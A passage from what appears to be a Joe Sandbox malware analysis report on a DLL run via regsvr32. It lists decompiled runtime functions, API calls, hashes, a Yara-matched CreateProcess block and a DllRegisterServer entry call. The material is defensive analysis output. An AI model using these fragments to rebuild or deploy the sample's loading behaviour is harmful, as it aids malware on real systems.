                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 652137993-0
                                                                                                        • Opcode ID: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
                                                                                                        • Instruction ID: 44adac28b97c9b0dc2a3eaf6598590973b3e8fcf4a62f0c92100f594847877cb
                                                                                                        • Opcode Fuzzy Hash: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
                                                                                                        • Instruction Fuzzy Hash: 40110B6261CA8581DA50EB14EC9116AB7A0FBC47D4F501222F6CE47AE9DF2CD145CF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC28901B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				signed char _t23;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC28902250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x28901b97;
                                                                                                        				E00007FFC7FFC289018F0(__rax, _a8);
                                                                                                        				E00007FFC7FFC28901BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
                                                                                                        				goto 0x28901be0;
                                                                                                        				r8d = 0;
                                                                                                        				_t23 = E00007FFC7FFC289022B0(_t31, _a8, _a24); // executed
                                                                                                        				if ((_t23 & 0x000000ff) == 0) goto 0x28901bdb;
                                                                                                        				E00007FFC7FFC289018F0(_t31, _a8);
                                                                                                        				E00007FFC7FFC289011E0(_t31, _a16, _a24);
                                                                                                        				return E00007FFC7FFC289023A0(_t31, _a8, _a24);
                                                                                                        			}




                                                                                                        0x7ffc28901b40
                                                                                                        0x7ffc28901b45
                                                                                                        0x7ffc28901b4a
                                                                                                        0x7ffc28901b67
                                                                                                        0x7ffc28901b6e
                                                                                                        0x7ffc28901b90
                                                                                                        0x7ffc28901b95
                                                                                                        0x7ffc28901b97
                                                                                                        0x7ffc28901ba4
                                                                                                        0x7ffc28901bae
                                                                                                        0x7ffc28901bb5
                                                                                                        0x7ffc28901bc7
                                                                                                        0x7ffc28901be4

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890226B
                                                                                                          • Part of subcall function 00007FFC28902250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC2890227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901B6E
                                                                                                          • Part of subcall function 00007FFC289018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289018FE
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC28901BB5
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC28901BC7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 872432861-0
                                                                                                        • Opcode ID: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
                                                                                                        • Instruction ID: 03d1e4ba3ecae547987de0530c9fb71d60a91af2c73047a2091c0f7d1850ed76
                                                                                                        • Opcode Fuzzy Hash: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
                                                                                                        • Instruction Fuzzy Hash: 9311EC6263CA9581DA84EB56EC9157B6360FBC5BC1F102037FE8E87B9ADE2DD400CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E00007FFC7FFC28903F18(void* __ecx) {
                                                                                                        				void* __rbx;
                                                                                                        				void* _t12;
                                                                                                        				void* _t17;
                                                                                                        				void* _t18;
                                                                                                        				void* _t19;
                                                                                                        				void* _t20;
                                                                                                        
                                                                                                        				_t2 =  ==  ? 1 :  *0x2897f1a0 & 0x000000ff;
                                                                                                        				 *0x2897f1a0 =  ==  ? 1 :  *0x2897f1a0 & 0x000000ff;
                                                                                                        				E00007FFC7FFC28904760(1, _t12, _t17, _t18, _t19, _t20);
                                                                                                        				if (E00007FFC7FFC28906AC0() != 0) goto 0x28903f47;
                                                                                                        				goto 0x28903f5b; // executed
                                                                                                        				E00007FFC7FFC2890A844(_t17); // executed
                                                                                                        				if (0 != 0) goto 0x28903f59;
                                                                                                        				E00007FFC7FFC28906B1C(0);
                                                                                                        				goto 0x28903f43;
                                                                                                        				return 1;
                                                                                                        			}









                                                                                                        0x7ffc28903f2c
                                                                                                        0x7ffc28903f2f
                                                                                                        0x7ffc28903f35
                                                                                                        0x7ffc28903f41
                                                                                                        0x7ffc28903f45
                                                                                                        0x7ffc28903f47
                                                                                                        0x7ffc28903f4e
                                                                                                        0x7ffc28903f52
                                                                                                        0x7ffc28903f57
                                                                                                        0x7ffc28903f60

                                                                                                        APIs
                                                                                                        • __isa_available_init.LIBCMT ref: 00007FFC28903F35
                                                                                                        • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC28903F3A
                                                                                                          • Part of subcall function 00007FFC28906AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC28906AC4
                                                                                                          • Part of subcall function 00007FFC28906AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC28906AC9
                                                                                                          • Part of subcall function 00007FFC28906AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC28906ACE
                                                                                                        • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC28903F52
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 3388242289-0
                                                                                                        • Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                        • Instruction ID: f7442454fd1578cc5f8ed304cfd2bb46b3eea0b71fb83f68077860b963e25235
                                                                                                        • Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                        • Instruction Fuzzy Hash: 02E0E550E0C2BE45FE2936712C522B916A4CF16302F4840BBDA5E962C3CE0F6459E579
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC28913F70() {
                                                                                                        				long long _v24;
                                                                                                        				long long _t5;
                                                                                                        				intOrPtr _t7;
                                                                                                        
                                                                                                        				_v24 = 0;
                                                                                                        				_t7 =  *0x2897fdd8; // 0x180000000
                                                                                                        				E00007FFC7FFC28919600(_t5, "fx", _t7, "DllRegisterServer");
                                                                                                        				_v24 = _t5;
                                                                                                        				ExitProcess(??);
                                                                                                        			}






                                                                                                        0x7ffc28913f74
                                                                                                        0x7ffc28913f84
                                                                                                        0x7ffc28913f92
                                                                                                        0x7ffc28913f97
                                                                                                        0x7ffc28913f9c

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID: DllRegisterServer
                                                                                                        • API String ID: 621844428-1663957109
                                                                                                        • Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                        • Instruction ID: ea4f2bfb579af563acd47712d0d95f0e07b15a151061b5dba3bfafe2d6ba3a25
                                                                                                        • Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                        • Instruction Fuzzy Hash: 2BD09E71918A9A81DA20BB54FC4539A63A0FB8834AFC00137D58C56AA8DF7CD259CB68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E00007FFC7FFC2890A9DC(intOrPtr* __rax, void* __rcx) {
                                                                                                        				int _t1;
                                                                                                        				intOrPtr _t3;
                                                                                                        				void* _t4;
                                                                                                        				void* _t11;
                                                                                                        				intOrPtr _t14;
                                                                                                        
                                                                                                        				if (__rcx == 0) goto 0x2890aa17;
                                                                                                        				_t14 =  *0x2897f930; // 0xa30000, executed
                                                                                                        				_t1 = HeapFree(_t11, ??); // executed
                                                                                                        				if (_t1 != 0) goto 0x2890aa12;
                                                                                                        				_t3 = E00007FFC7FFC2890B34C(GetLastError(), __rax, _t14, __rcx);
                                                                                                        				_t4 = E00007FFC7FFC2890B420(__rax);
                                                                                                        				 *__rax = _t3;
                                                                                                        				return _t4;
                                                                                                        			}








                                                                                                        0x7ffc2890a9df
                                                                                                        0x7ffc2890a9eb
                                                                                                        0x7ffc2890a9f2
                                                                                                        0x7ffc2890a9fa
                                                                                                        0x7ffc2890aa04
                                                                                                        0x7ffc2890aa0b
                                                                                                        0x7ffc2890aa10
                                                                                                        0x7ffc2890aa17

                                                                                                        APIs
                                                                                                        • RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFC2890F492,?,?,?,00007FFC2890F4CF,?,?,00000000,00007FFC2890F144,?,?,?,00007FFC2890F077), ref: 00007FFC2890A9F2
                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FFC2890F492,?,?,?,00007FFC2890F4CF,?,?,00000000,00007FFC2890F144,?,?,?,00007FFC2890F077), ref: 00007FFC2890A9FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastPrivilegeRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1334314998-0
                                                                                                        • Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                        • Instruction ID: 6f5788ed61210d9dfe0c6efbc800e8e42367b96069baf72221c2333f259b3c49
                                                                                                        • Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                        • Instruction Fuzzy Hash: 0EE08C50F1A22A82FF097BF26C441782195DF94B42F445036C90D662D2EE2CA855C27C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.261968375.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                        • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC289022B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
                                                                                                        				long long _v16;
                                                                                                        				signed char _v24;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				intOrPtr* _t50;
                                                                                                        
                                                                                                        				_t48 = __rax;
                                                                                                        				_a24 = r8b;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC28902830(__rax, _a8);
                                                                                                        				if (_t48 - _a16 >= 0) goto 0x289022de;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902150(_t48, _a8);
                                                                                                        				if ( *_t48 - _a16 >= 0) goto 0x28902310;
                                                                                                        				E00007FFC7FFC28902170(_t48, _a8);
                                                                                                        				E00007FFC7FFC28902600(_a8, _a16,  *_t48); // executed
                                                                                                        				goto 0x2890237a;
                                                                                                        				if ((_a24 & 0x000000ff) == 0) goto 0x28902366;
                                                                                                        				if (_a16 - 0x10 >= 0) goto 0x28902366;
                                                                                                        				E00007FFC7FFC28902170(_t48, _a8);
                                                                                                        				if (_a16 -  *_t48 >= 0) goto 0x28902341;
                                                                                                        				_t50 = _a16;
                                                                                                        				_v16 = _t50;
                                                                                                        				goto 0x28902353;
                                                                                                        				E00007FFC7FFC28902170(_t50, _a8);
                                                                                                        				_v16 =  *_t50;
                                                                                                        				E00007FFC7FFC28901910(1,  *_t50, _a8, _v16);
                                                                                                        				goto 0x2890237a;
                                                                                                        				if (_a16 != 0) goto 0x2890237a;
                                                                                                        				E00007FFC7FFC289023A0( *_t50, _a8, _a16);
                                                                                                        				if (_a16 <= 0) goto 0x2890238c;
                                                                                                        				_v24 = 1;
                                                                                                        				goto 0x28902394;
                                                                                                        				_v24 = 0;
                                                                                                        				return _v24 & 0x000000ff;
                                                                                                        			}







                                                                                                        0x7ffc289022b0
                                                                                                        0x7ffc289022b0
                                                                                                        0x7ffc289022b5
                                                                                                        0x7ffc289022ba
                                                                                                        0x7ffc289022c8
                                                                                                        0x7ffc289022d2
                                                                                                        0x7ffc289022d9
                                                                                                        0x7ffc289022e3
                                                                                                        0x7ffc289022f0
                                                                                                        0x7ffc289022f7
                                                                                                        0x7ffc28902309
                                                                                                        0x7ffc2890230e
                                                                                                        0x7ffc28902317
                                                                                                        0x7ffc2890231f
                                                                                                        0x7ffc28902326
                                                                                                        0x7ffc28902333
                                                                                                        0x7ffc28902335
                                                                                                        0x7ffc2890233a
                                                                                                        0x7ffc2890233f
                                                                                                        0x7ffc28902346
                                                                                                        0x7ffc2890234e
                                                                                                        0x7ffc2890235f
                                                                                                        0x7ffc28902364
                                                                                                        0x7ffc2890236c
                                                                                                        0x7ffc28902375
                                                                                                        0x7ffc28902380
                                                                                                        0x7ffc28902382
                                                                                                        0x7ffc2890238a
                                                                                                        0x7ffc2890238c
                                                                                                        0x7ffc2890239d

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890283E
                                                                                                          • Part of subcall function 00007FFC28902830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFC2890284B
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC289022D9
                                                                                                          • Part of subcall function 00007FFC28902170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890217E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
                                                                                                        • String ID:
                                                                                                        • API String ID: 1903167320-0
                                                                                                        • Opcode ID: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
                                                                                                        • Instruction ID: 839ed7cebccdf22d58318f979c836a75d0c4dae210cb355d753161c3faf2777f
                                                                                                        • Opcode Fuzzy Hash: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
                                                                                                        • Instruction Fuzzy Hash: 3721EF2290CA5981DA21AB95EC5037E6770FBC5B85F204433E78D476E9CE3FD580CB18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC2891060C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                        
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a16 = __rsi;
                                                                                                        				_a24 = __rdi;
                                                                                                        				if (__ecx - 0x2000 < 0) goto 0x28910654;
                                                                                                        				E00007FFC7FFC2890B420(__rax);
                                                                                                        				 *__rax = 9;
                                                                                                        				E00007FFC7FFC28909744();
                                                                                                        				return 9;
                                                                                                        			}



                                                                                                        0x7ffc2891060c
                                                                                                        0x7ffc28910611
                                                                                                        0x7ffc28910616
                                                                                                        0x7ffc28910629
                                                                                                        0x7ffc2891062b
                                                                                                        0x7ffc28910635
                                                                                                        0x7ffc28910637
                                                                                                        0x7ffc28910653

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 3215553584-0
                                                                                                        • Opcode ID: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
                                                                                                        • Instruction ID: 0da48f6d848ec3187e42bb5a8d7e8a18ff96a83a8e4cd489914718caf3b0183e
                                                                                                        • Opcode Fuzzy Hash: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
                                                                                                        • Instruction Fuzzy Hash: 1411607291C66A86E710FB18AC4057963A0FB84781F550236E68D67AD2DF3DE810CB28
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC2890AAD0(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                        				intOrPtr* _t22;
                                                                                                        				signed int _t29;
                                                                                                        
                                                                                                        				_t29 = __rdx;
                                                                                                        				if (__rcx == 0) goto 0x2890aaef;
                                                                                                        				_t1 = _t29 - 0x20; // -32
                                                                                                        				_t22 = _t1;
                                                                                                        				if (_t22 - __rdx < 0) goto 0x2890ab32;
                                                                                                        				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                        				goto 0x2890ab16;
                                                                                                        				if (E00007FFC7FFC2890E958() == 0) goto 0x2890ab32;
                                                                                                        				if (E00007FFC7FFC289097EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x2890ab32;
                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                        				if (_t22 == 0) goto 0x2890ab01;
                                                                                                        				goto 0x2890ab3f;
                                                                                                        				E00007FFC7FFC2890B420(_t22);
                                                                                                        				 *_t22 = 0xc;
                                                                                                        				return 0;
                                                                                                        			}





                                                                                                        0x7ffc2890aad0
                                                                                                        0x7ffc2890aadf
                                                                                                        0x7ffc2890aae3
                                                                                                        0x7ffc2890aae3
                                                                                                        0x7ffc2890aaed
                                                                                                        0x7ffc2890aafb
                                                                                                        0x7ffc2890aaff
                                                                                                        0x7ffc2890ab08
                                                                                                        0x7ffc2890ab14
                                                                                                        0x7ffc2890ab25
                                                                                                        0x7ffc2890ab2e
                                                                                                        0x7ffc2890ab30
                                                                                                        0x7ffc2890ab32
                                                                                                        0x7ffc2890ab37
                                                                                                        0x7ffc2890ab44

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC2890BAAE,?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000), ref: 00007FFC2890AB25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                        • Instruction ID: e487690c4442692302bb6a02ea31a7acdc498fa7a28450ac63f6adb50e80b04c
                                                                                                        • Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                        • Instruction Fuzzy Hash: 92F04F45B1A22B85FE557BA15C112B512C6DF94742F4C4033C90D862C1ED2EE861D278
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC2890AA18(intOrPtr* __rax, void* __rcx) {
                                                                                                        
                                                                                                        				if (__rcx - 0xffffffe0 > 0) goto 0x2890aa63;
                                                                                                        				_t16 =  ==  ? __rax : __rcx;
                                                                                                        				goto 0x2890aa4a;
                                                                                                        				if (E00007FFC7FFC2890E958() == 0) goto 0x2890aa63;
                                                                                                        				if (E00007FFC7FFC289097EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x2890aa63;
                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                        				if (__rax == 0) goto 0x2890aa35;
                                                                                                        				goto 0x2890aa70;
                                                                                                        				E00007FFC7FFC2890B420(__rax);
                                                                                                        				 *__rax = 0xc;
                                                                                                        				return 0;
                                                                                                        			}



                                                                                                        0x7ffc2890aa25
                                                                                                        0x7ffc2890aa2f
                                                                                                        0x7ffc2890aa33
                                                                                                        0x7ffc2890aa3c
                                                                                                        0x7ffc2890aa48
                                                                                                        0x7ffc2890aa56
                                                                                                        0x7ffc2890aa5f
                                                                                                        0x7ffc2890aa61
                                                                                                        0x7ffc2890aa63
                                                                                                        0x7ffc2890aa68
                                                                                                        0x7ffc2890aa75

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,?,?,00007FFC2891040D,?,?,00000000,00007FFC2890D8B7,?,?,?,00007FFC2890A427,?,?,?,00007FFC2890A31D), ref: 00007FFC2890AA56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
